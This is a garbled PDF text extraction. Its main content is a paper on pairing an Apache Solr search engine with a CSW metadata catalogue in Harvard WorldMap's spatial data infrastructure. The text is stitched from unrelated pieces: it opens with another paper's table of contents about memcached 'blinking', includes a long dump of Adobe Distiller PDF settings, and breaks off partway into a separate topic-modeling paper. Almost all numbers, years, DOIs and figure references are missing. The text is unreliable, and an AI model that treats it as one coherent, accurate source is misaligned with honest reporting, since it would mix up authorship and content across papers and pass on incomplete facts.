and overview blink prototype blink hardware platform blink software architecture blinkcache: blinking memcached memcached overview access patterns and performance metrics blinkcache design alternatives summary greencache: blinking multimedia cache multimedia cache overview youtube trace analysis greencache design implementation blinkcache implementation greencache implementation blink emulator power signal evaluation blinkcache evaluation greencache evaluation related work applicability of blinking conclusion references enhancing discovery in spatial data infrastructures using a search engine enhancing discovery in spatial data infrastructures using a search engine paolo corti , athanasios tom kralidis and benjamin lewis center for geographic analysis, harvard university, cambridge, ma, usa open source geospatial foundation, beaverton, or, usa abstract a spatial data infrastructure (sdi) is a framework of geospatial data, metadata, users and tools intended to provide an efficient and flexible way to use spatial information. one of the key software components of an sdi is the catalogue service which is needed to discover, query and manage the metadata. catalogue services in an sdi are typically based on the open geospatial consortium (ogc) catalogue service for the web (csw) standard which defines common interfaces for accessing the metadata information. a search engine is a software system capable of supporting fast and reliable search, which may use ‘any means necessary’ to get users to the resources they need quickly and efficiently. these techniques may include full text search, natural language processing, weighted results, fuzzy tolerance results, faceting, hit highlighting, recommendations and many others. in this paper we present an example of a search engine being added to an sdi to improve search against large collections of geospatial datasets. the centre for geographic analysis (cga) at harvard university re-engineered the search component of its public domain sdi (harvard worldmap) which is based on the geonode platform. a search engine was added to the sdi stack to enhance the csw catalogue discovery abilities. it is now possible to discover spatial datasets from metadata by using the standard search operations of the catalogue and to take advantage of the new abilities of the search engine, to return relevant and reliable content to sdi users. subjects human-computer interaction, spatial and geographic information systems keywords data discovery, catalogue service for the web, metadata, worldmap, geoportal, search engine, spatial data infrastructure, pycsw, solr, geonode introduction a spatial data infrastructure (sdi) typically stores a large collection of metadata. while the open geospatial consortium (ogc) recommends the use of the catalogue service for the web (csw) standard to query these metadata, several important benefits can be obtained by pairing the csw with a search engine platform within the sdi software stack. sdi, interoperability, and standards an sdi is a framework of geospatial data, metadata, users and tools which provides a mechanism for publishing and updating geospatial information. an sdi provides the architectural underpinnings for the discovery, evaluation and use of geospatial information (nebert, ; goodchild, fu & rich, ; masó, pons & zabala, ). sdis are typically distributed in nature, and connected by disparate computing platforms and client/server design patterns. how to cite this article corti et al. ( ), enhancing discovery in spatial data infrastructures using a search engine. peerj comput. sci. :e ; doi . /peerj-cs. submitted january accepted april published may corresponding author paolo corti, pcorti@gmail.com academic editor alessandro frigeri additional information and declarations can be found on page doi . /peerj-cs. copyright corti et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:pcorti@�gmail.�com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ a critical principle of an sdi is interoperability which can be defined as the ability of a system or components in a system to provide information sharing and inter-application cooperative process control through a mutual understanding of request and response mechanisms embodied in standards. standards (formal, de facto, community) provide three primary benefits for geospatial information: (a) portability: use and reuse of information and applications, (b) interoperability: multiple system information exchange and (c) maintainability: long term updating and effective use of a resource (groot & mclaughlin, ). the ogc standards baseline has traditionally provided core standards definitions to major sdi activities. along with other standards bodies (ietf, iso, oasis) and de facto/community efforts (open source geospatial foundation (osgeo), etc.), ogc standards provide broadly accepted, mature specifications, profiles and best practices (kralidis, ). metadata search in an sdi and csw an sdi can contain a large number of geospatial datasets which may grow in number over time. the difficulty of finding a needle in such a haystack means a more effective metadata search mechanism is called for. metadata is data about data, describe the content, quality, condition and other characteristics of data in order to ease the search and understanding of data (nogueras-iso, zarazaga-soria & muro-medrano, ). metadata standards define a way to provide homogeneous information about the identification, the extent, the spatial and temporal aspects, the content, the spatial reference, the portrayal, distribution and other properties of digital geographic data and services (iso - : , ). ease of data discovery is a critical measure of the effectiveness of an sdi. the ogc csw standard specify the interfaces and bindings, as well as a framework for defining the application profiles required to publish and access digital catalogues of metadata for geospatial data and services (open geospatial consortium, ; nebert, whiteside & vretanos, ; rajabifard, kalantari & binns, ). based on the dublin core metadata information model, csw supports broad interoperability around discovering geospatial data and services spatially, non-spatially, temporally, and via keywords or free text. csw supports application profiles which allow for information communities to constrain and/or extend the csw specification to satisfy specific discovery requirements and to realize tighter coupling and integration of geospatial data and services. the csw iso application profile is an example of a standard for geospatial data search which follows iso geospatial metadata standards. csw catalogue within the sdi architecture in a typical sdi architecture the following components can be identified: � gis clients: desktop gis tools or web based viewers. � spatial data server: returns geospatial data to map clients in a range of formats. � cache data server: returns cached tiles to map clients to improve performance. � processing server: responsible for the processing of the geospatial datasets. corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � spatial repository: a combination of a spatial database and file system, where the geospatial data is stored. � catalogue server: used by map clients to query the metadata of the spatial datasets to support discovery. desktop gis clients generally access the sdi data directly from the spatial repository or the file system. when the user has appropriate permissions from these clients it is possible to perform advanced operations, which are generally faster than when performed over ogc web standards. web based viewers access the sdi data served by the spatial data server using a number of ogc web standards over http, typically wms/wmts/wms-c when it is just needed to render the data, or wfs/wcs when it is needed to access to the native information respectively for vector or cover datasets. wfs-t can be used for editing vector datasets. web viewers can run gis sdi processes by using the wps standard exposed by the processing server. all of these ogc standards can be used by desktop gis clients as well. the spatial repository is generally a combination of a rdbms with a spatial extension and the file system where are stored data which are not in the database. the catalogue, based on the csw standard, lets users to discover data and services in an sdi. csw is a standard for exposing a catalogue of geospatial entities over the http request/response cycle. in a sdi or portal csw endpoints are provided by a csw catalogue. popular open source implementations of csw catalogue include (but are not limited to) pycsw (http://pycsw.org/), geonetwork (https://geonetwork-opensource.org/), degree (https://www.deegree.org/) and esri geoportal server (https://www.esri.com/en-us/ arcgis/products/geoportal-server/overview). a csw catalogue implements a number of operations which are accessible via http. some of these operations are optional: � getcapabilities retrieves service metadata from the server. � describerecord allows a client to discover the data model of a specific catalogue information model. � getrecords searches for records using a series of criteria, which can be spatial, aspatial, logical, comparative. � getrecordbyid retrieves metadata for one record (layer) of the catalogue by its id. � getdomain (optional) retrieves runtime information about the range of values of a metadata record element or request parameter. � harvest (optional) creates or updates metadata with a request to the server to ‘pull’ metadata from some endpoint. � transaction (optional) creates or edits metadata with a request to the server. need for a search engine within an sdi search workflow and user experience are a vital part of modern web-based applications. numerous types of web application, such as content management systems (cms), wikis, data delivery frameworks, all can benefit from improved data discovery. same applies corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://pycsw.org/ https://geonetwork-opensource.org/ https://www.deegree.org/ https://www.esri.com/en-us/arcgis/products/geoportal-server/overview https://www.esri.com/en-us/arcgis/products/geoportal-server/overview http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to sdi. furthermore, in the big data era, more powerful mechanisms are needed to return relevant content to the users from very large collections of data (tsinaraki & schade, ). in the last few years, content-driven platforms have delegated the task of search optimization to specific frameworks known as search engines. rather than implementing a custom search logic, these platforms now often add a search engine in the stack to improve search. apache solr (http://lucene.apache.org/solr/) and elasticsearch (https:// www.elastic.co/), two popular open source search engine web platforms, both based on apache lucene (https://lucene.apache.org/), are commonly used in typical web application stacks to support complex search criteria, faceting, results highlighting, query spell-check, relevance tuning and more (smiley et al., ). as for cms’s, sdi search can dramatically benefit from such platforms as well. how a search engine works typically the way a search engine works can be split into two distinct phases: indexing and searching. during the indexing phase, all of the documents (metadata, in the sdi context) that must be searched are scanned, and a list of search terms (an index) is built. for each search term, the index keeps track of the identifiers of the documents that contain the search term. during the searching phase only the index is looked at, and a list of the documents containing the given search term is quickly returned to the client. this indexed approach makes a search engine extremely fast in outputting results. on top of this, a search engine provides many other useful search related features, improving dramatically the experience of users. improvements in an sdi with a search engine there are numerous opportunities to enhance the functionality of the csw specification and subsequent server implementations by specifying standard search engine functionality as enhancements to the standard. a search engine is extremely fast and scalable: by building and maintaining its indexed structure of the content, it can return results much faster and scale much better than a traditional csw based on a relational database. while a csw can search metadata with a full text approach, with a search engine it is possible to extend the full text search with features such as language stemming, thesaurus and synonyms, hit highlighting, wild-card matches and other ‘fuzzy’ matching techniques. another key advantage is that search engines can provide relevancy scores for likely matches, allowing for much finer tuning of search results. csw does not easily emit facets or facet counts as part of search results. search engine facets however, can be based on numerous classification schemes, such as named geography, date and time extent, keywords, etc. and can be used to enable interactive feedback mechanisms which help users define and refine their searches effectively. background harvard worldmap (http://worldmap.harvard.edu/) is an open source sdi and geospatial content management system (geocms) platform developed by the centre for geographic analysis (cga) to lower the barrier for scholars who wish to explore, visualize, edit and publish geospatial information (guan et al., ). registered users are corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://lucene.apache.org/solr/ https://www.elastic.co/ https://www.elastic.co/ https://lucene.apache.org/ http://worldmap.harvard.edu/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ able to upload geospatial content, in the form of vector or raster datasets (layers), and combine them with existing layers to create maps. existing layers can be layers uploaded by other users and layers provided by external map services. worldmap is a web application built on top of the geonode open source mapping platform (http://geonode.org/), and since has been used by more than , registered users to upload about , layers and to create some , web maps. users can also access about , layers from remote map services based on ogc standards and esri rest protocols. worldmap is based on the following components, all open source and designed around ogc standards (fig. ): � a javascript web gis client, geoexplorer (http://suite.boundlessgeo.com/docs/latest/), based on openlayers (https://openlayers.org/) and extjs (https://www.sencha.com/ products/extjs/). figure the worldmap sdi architecture. full-size doi: . /peerj-cs. /fig- corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://geonode.org/ http://suite.boundlessgeo.com/docs/latest/ https://openlayers.org/ https://www.sencha.com/products/extjs/ https://www.sencha.com/products/extjs/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � a spatial data server based on geoserver (http://geoserver.org/). � a cache data server based on geowebcache (http://geowebcache.org/). � a spatial database implemented with postgresql (https://www.postgresql.org/) and postgis (https://postgis.net/). � a catalogue based on pycsw or geonetwork. � aweb application, developed with django (https://www.djangoproject.com/), a python web framework, which orchestrates all of the previous components. worldmap allows users to build maps using its internal catalogue of layers (local layers) combined with layers from external map services (remote layers), for a total of about , layers. worldmap users can have trouble finding useful and reliable layers given the large number of them; a system was needed to enable fast, scalable search capable of returning the most reliable and useful layers within a large and heterogeneous collection. results and discussion in cga started the design and development of hypermap registry (hypermap) (https://github.com/cga-harvard/hypermap-registry) to improve search for worldmap users. hypermap is an application that manages ogc web services (such as wms, wmts, csw capabilities service metadata) as well as esri restendpoints. in addition it supports map service discovery (chen et al., ), crawling (bone et al., ; li, yang & yang, ), harvesting and uptime statistics gathering for services and layers. one of the main purposes of hypermap is to bring enhanced search engine capabilities into an sdi architecture. as it can be seen from the following fig. , search engine documents, based on a provided schema, must be kept in synchrony with layer metadata stored in the geonode rdbms. hypermap is responsible for ensuring that the worldmap search engine, based on apache solr, and the worldmap catalogue rdbms, based on postgresql, are kept in sync. for example, when a worldmap user updates the metadata information for one layer from the worldmap metadata editing interface, that information is updated in the worldmap pycsw backend, which is based on the rdbms. as soon as this happens, a synchronization task is sent from hypermap to the task queue. the task will be processed by the task queue, and all of the metadata information for the layer will be synced to the corresponding search engine document. thanks to this synchronization mechanism, worldmap users can search the existing layers metadata using a search engine rather than the ogc catalogue, enabling more flexible searches which filter on keywords, source, layer type, map extent and date range (corti & lewis, ). the results are returned by the search engine which returns a json response, and tabular in addition to spatial views (based on spatial facets) are returned to the browser (fig. ). worldmap improvements with the search engine by pairing the csw catalogue with a search engine, the metadata search in the worldmap sdi yields several major benefits. corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://geoserver.org/ http://geowebcache.org/ https://www.postgresql.org/ https://postgis.net/ https://www.djangoproject.com/ https://github.com/cga-harvard/hypermap-registry http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fast results by having the metadata content indexed in a search engine, metadata are returned very rapidly to the client. because of its indexed documents nature, a search engine is much faster to return results when compared it with a relational database. therefore, using a search engine in worldmap search client makes things much faster than using a csw catalogue based on a rdbms. scalability from a software engineering perspective, search engines are highly scalable and replicable, thanks to their shardable architecture. such systems are capable of providing interactive query access to collections of spatio-temporal objects containing billions of features (kakkar & lewis, ; kakkar et al., ). clean api query to the search engine api tends to be much simpler than xml queries to the csw catalogue, specially when crafting advanced search requests (spatial, non-spatial, temporal, etc.). same for output: json output from search engine api provides a more compact representation of search results enabling better performance and making the output more readable (figs. and ). figure metadata rdbms to search engine synchronization in harvard worldmap. full-size doi: . /peerj-cs. /fig- corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ synonyms, text stemming crucially, search engines are good at handling the ambiguities of natural languages, thanks to stop words (words filtered out during the processing of text), stemming (ability to detect words derived from a common root), synonyms detection and controlled vocabularies such as thesauri and taxonomies. it is possible to do phrase searches and proximity searches (search for a phrase containing two different words separated by a specified number of words). because of features like these, keyword queries using the hypermap search engine endpoint typically returns more results than an equivalent figure csw request and response. full-size doi: . /peerj-cs. /fig- corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure search engine request and response. full-size doi: . /peerj-cs. /fig- corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ query using the hypermap csw. for example doing a full text search for the keyword ‘library’ returns more results from the search engine because it includes variations and synonyms of the original term like ‘libraries,’ ‘bibliotheca,’ ‘repository,’ ‘repositories’ in the returned results. figure facets generate counts for metadata categories and geographic regions in a geocms. full-size doi: . /peerj-cs. /fig- corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ relevancy results can be ranked, providing a way to return results to users with the more relevant ones closer to the top. this is very useful to detect the most significative metadata for a given query. weights can be assigned by specifying boosts (weighted factors) for each field. facets another important search engine feature useful for searching the worldmap metadata catalogue is faceted search. faceting is the arrangement of search results in categories based on indexed terms. this capability makes it possible, for example to provide an immediate indication of the number of times that common keywords are contained in different metadata documents. a typical use case is with metadata categories, keywords and regions. thanks to facets, the user interface of an sdi catalogue can display counts for documents by category, keyword or region (fig. ). search engines can also support temporal and spatial faceting, two features that are extremely useful for browsing large collections of geospatial metadata. temporal faceting can display the number of metadata documents by date range as a kind of histogram. spatial faceting can provide a spatial surface representing the distribution of layers or features across an area of interest. in fig. , a heatmap is generated by spatial faceting which shows the distribution of layers in the worldmap sdi for a given geographic region (fig. ). figure spatial faceting enables heatmaps showing the distribution of the sdi layers in the space. full-size doi: . /peerj-cs. /fig- corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ other features in addition, it is possible to use regular expressions, wildcard search and fuzzy search to provide results for a given term and its common variations. it is also possible to support boolean queries: a user is able to search results using terms and boolean operators such as and, or, not and hit highlighting can provide immediate search term suggestions to the user searching a text string in metadata. conclusion while the csw . . standard provides improvements to address mass market search/ discovery, the benefits of search engine implementations combined with broad interoperability of the csw standard presents a great opportunity to enhance the csw figure pycsw interaction with the search engine using an application profile and using a basic profile (when pycsw will provide direct support for the search engine). full-size doi: . /peerj-cs. /fig- corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ standard. the authors hope that such an approach eventually becomes formalized as a csw application profile or best practice in order to achieve maximum benefit and adoption in sdi activities. this will allow csw implementations to make better use of search engine methodologies for improving the user search experience in sdi workflows. in addition, pycsw is planning for dedicated elasticsearch/solr support as part of a future release to enable the use of search engines as backend stores to the csw standard. this is a different approach from using an application profile or best practice, as it directly interacts with data in the search engine rather than in the rdbms (fig. ). the authors would like to share this work with the ogc csw community in support of the evolution of the csw specification. given recent developments on the ogc wfs . standard (restful design patterns, json, etc.), there is an opportunity for csw to evolve in alignment with wfs . in support of the principles of the w c spatial data on the web best practices (group, ) in a manner similar to the work presented in this paper. acknowledgements the authors thank all the contributors to the hypermap and geonode platform source code, particularly: wayner barrios, matt bertrand, simone dalmasso, alessio fabiani, jorge martı́nez gómez, wendy guan, jeffrey johnson, devika kakkar, jude mwenda, ariel núñez, luis pallares, david smiley, charles thao, angelos tzotsos, mingda zhang. additional information and declarations funding this work is partially funded by the u.s. national endowment for the humanities, digital humanities implementation grant #hk and the u.s. national science foundation industry-university cooperative research centers program (iucrc) grant for the spatiotemporal thinking, computing, and applications center (stc) # , and by harvard university. grant administration was supported by harvard’s institute for quantitative social science. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: u.s. national endowment for the humanities, digital humanities implementation: #hk . u.s. national science foundation industry-university cooperative research centers program (iucrc). spatiotemporal thinking, computing, and applications center (stc): # . harvard university. harvard’s institute for quantitative social science. corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ competing interests the authors declare that they have no competing interests. author contributions � paolo corti conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � athanasios tom kralidis performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � benjamin lewis performed the experiments, analyzed the data, contributed reagents/ materials/analysis tools, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: hypermap registry: https://github.com/cga-harvard/hypermap-registry references bone c, ager a, bunzel k, tierney l. . a geospatial search engine for discovering multi- format geospatial data across the web. international journal of digital earth ( ): – doi . / . . . chen n, chen z, hu c, di l. . a capability matching and ontology reasoning method for high precision ogc web service discovery. international journal of digital earth ( ): – doi . / . . . corti p, lewis b. . making temporal search more central in spatial data infrastructures. in: isprs annals of photogrammetry, remote sensing and spatial information sciences. germany: copernicus publications, – . goodchild mf, fu p, rich p. . sharing geographic information: an assessment of the geospatial one-stop. annals of the association of american geographers ( ): – doi . /j. - . . .x. groot r, mclaughlin jd. . geospatial data infrastructure: concepts, cases, and good practice. oxford: oxford university press. group oww. . spatial data on the web best practices. available at https://www.w .org/tr/ sdw-bp/ (accessed march ). guan ww, bol pk, lewis bg, bertrand m, berman ml, blossom jc. . worldmap—a geospatial framework for collaborative research. annals of gis ( ): – doi . / . . . iso - : . . geographic information—metadata—part : fundamentals. geneva: international standards organisation. kakkar d, lewis b. . building a billion spatio-temporal object search and visualization platform. in: isprs annals of photogrammetry, remote sensing and spatial information sciences. germany: copernicus publications, – . corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/cga-harvard/hypermap-registry http://dx.doi.org/ . / . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /j. - . . .x https://www.w .org/tr/sdw-bp/ https://www.w .org/tr/sdw-bp/ http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kakkar d, lewis b, smiley d, nunez a. . the billion object platform (bop): a system to lower barriers to support big, streaming, spatio-temporal data sources. free and open source software for geospatial (foss g) conference proceedings : doi . /r st n g. kralidis at. . geospatial web services: the evolution of geospatial data infrastructure. in: the geospatial web. london: springer, – . li w, yang c, yang c. . an active crawler for discovering geospatial web services and their distribution pattern—a case study of ogc web map service. international journal of geographical information science ( ): – doi . / . masó j, pons x, zabala a. . tuning the second-generation sdi: theoretical aspects and real use cases. international journal of geographical information science ( ): – doi . / . . . nebert dd. . developing spatial data infrastructures: the sdi cookbook. global spatial data infrastructure (gsdi) association. available at http://gsdiassociation.org/images/publications/ cookbooks/sdi_cookbook_gsdi_ _ver .pdf. nebert d, whiteside a, vretanos p. . ogc catalogue services specification. open geospatial consortium inc. available at https://portal.opengeospatial.org/files/?artifact_id= . nogueras-iso j, zarazaga-soria fj, muro-medrano pr. . geographic information metadata for spatial data infrastructures: resources, interoperability and information retrieval. berlin, heidelberg: springer berlin heidelberg. open geospatial consortium. . catalogue service. available at http://www.opengeospatial. org/standards/cat/ (accessed march ). rajabifard a, kalantari m, binns a. . sdi and metadata entry and updating tools. in: sdi convergence. available at https://minerva-access.unimelb.edu.au/bitstream/handle/ / / _sdiandmetadataentryandupdatingtool.pdf. smiley d, pugh e, parisa k, mitchell m. . apache solr enterprise search server. birmingham: packt publishing ltd. tsinaraki c, schade s. . big data—a step change for sdi? international journal : – . corti et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /r st n g http://dx.doi.org/ . / http://dx.doi.org/ . / . . http://gsdiassociation.org/images/publications/cookbooks/sdi_cookbook_gsdi_ _ver .pdf http://gsdiassociation.org/images/publications/cookbooks/sdi_cookbook_gsdi_ _ver .pdf https://portal.opengeospatial.org/files/?artifact_id= http://www.opengeospatial.org/standards/cat/ http://www.opengeospatial.org/standards/cat/ https://minerva-access.unimelb.edu.au/bitstream/handle/ / / _sdiandmetadataentryandupdatingtool.pdf https://minerva-access.unimelb.edu.au/bitstream/handle/ / / _sdiandmetadataentryandupdatingtool.pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ enhancing discovery in spatial data infrastructures using a search engine introduction background results and discussion conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice anchored correlation explanation: topic modeling with minimal domain knowledge ryan j. gallagher , , kyle reing , david kale , and greg ver steeg information sciences institute, university of southern california vermont complex systems center, computational story lab, university of vermont ryan.gallagher@uvm.edu {reing,kale,gregv}@isi.edu abstract while generative models such as latent dirichlet allocation (lda) have proven fruit- ful in topic modeling, they often require de- tailed assumptions and careful specification of hyperparameters. such model complexity is- sues only compound when trying to general- ize generative models to incorporate human input. we introduce correlation explanation (corex), an alternative approach to topic mod- eling that does not assume an underlying gen- erative model, and instead learns maximally informative topics through an information- theoretic framework. this framework nat- urally generalizes to hierarchical and semi- supervised extensions with no additional mod- eling assumptions. in particular, word-level domain knowledge can be flexibly incorpo- rated within corex through anchor words, al- lowing topic separability and representation to be promoted with minimal human interven- tion. across a variety of datasets, metrics, and experiments, we demonstrate that corex produces topics that are comparable in quality to those produced by unsupervised and semi- supervised variants of lda. introduction the majority of topic modeling approaches utilize probabilistic generative models, models which spec- ify mechanisms for how documents are written in order to infer latent topics. these mechanisms may be explicitly stated, as in latent dirichlet alloca- tion (lda) (blei et al., ), or implicitly stated, as with matrix factorization techniques (hofmann, ; ding et al., ; buntine and jakulin, ). the core generative mechanisms of lda, in par- ticular, have inspired numerous generalizations that account for additional information, such as the au- thorship (rosen-zvi et al., ), document labels (mcauliffe and blei, ), or hierarchical structure (griffiths et al., ). however, these generalizations come at the cost of increasingly elaborate and unwieldy generative assumptions. while these assumptions allow topic inference to be tractable in the face of additional metadata, they progressively constrain topics to a narrower view of what a topic can be. such assump- tions are undesirable in contexts where one wishes to minimize model complexity and learn topics with- out preexisting notions of how those topics origi- nated. for these reasons, we propose topic modeling by way of correlation explanation (corex), an information-theoretic approach to learning latent topics over documents. unlike lda, corex does not assume a particular data generating model, and instead searches for topics that are “maximally in- formative” about a set of documents. by learning informative topics rather than generated topics, we avoid specifying the structure and nature of topics ahead of time. in addition, the lightweight framework underly- ing corex is versatile and naturally extends to hier- archical and semi-supervised variants with no addi- tional modeling assumptions. more specifically, we open source, documented code for the corex topic model available at https://github.com/gregversteeg/ corex_topic. transactions of the association for computational linguistics, vol. , pp. – , . action editor: diana mccarthy. submission batch: / published / . c© association for computational linguistics. distributed under a cc-by . license. may flexibly incorporate word-level domain knowl- edge within the corex topic model. topic models are often susceptible to portraying only dominant themes of documents. injecting a topic model, such as corex, with domain knowledge can help guide it towards otherwise underrepresented topics that are of importance to the user. by incorporating rele- vant domain words, we might encourage our topic model to recognize a rare disease that would other- wise be missed in clinical health notes, focus more attention to topics from news articles that can guide relief workers in distributing aid more effectively, or 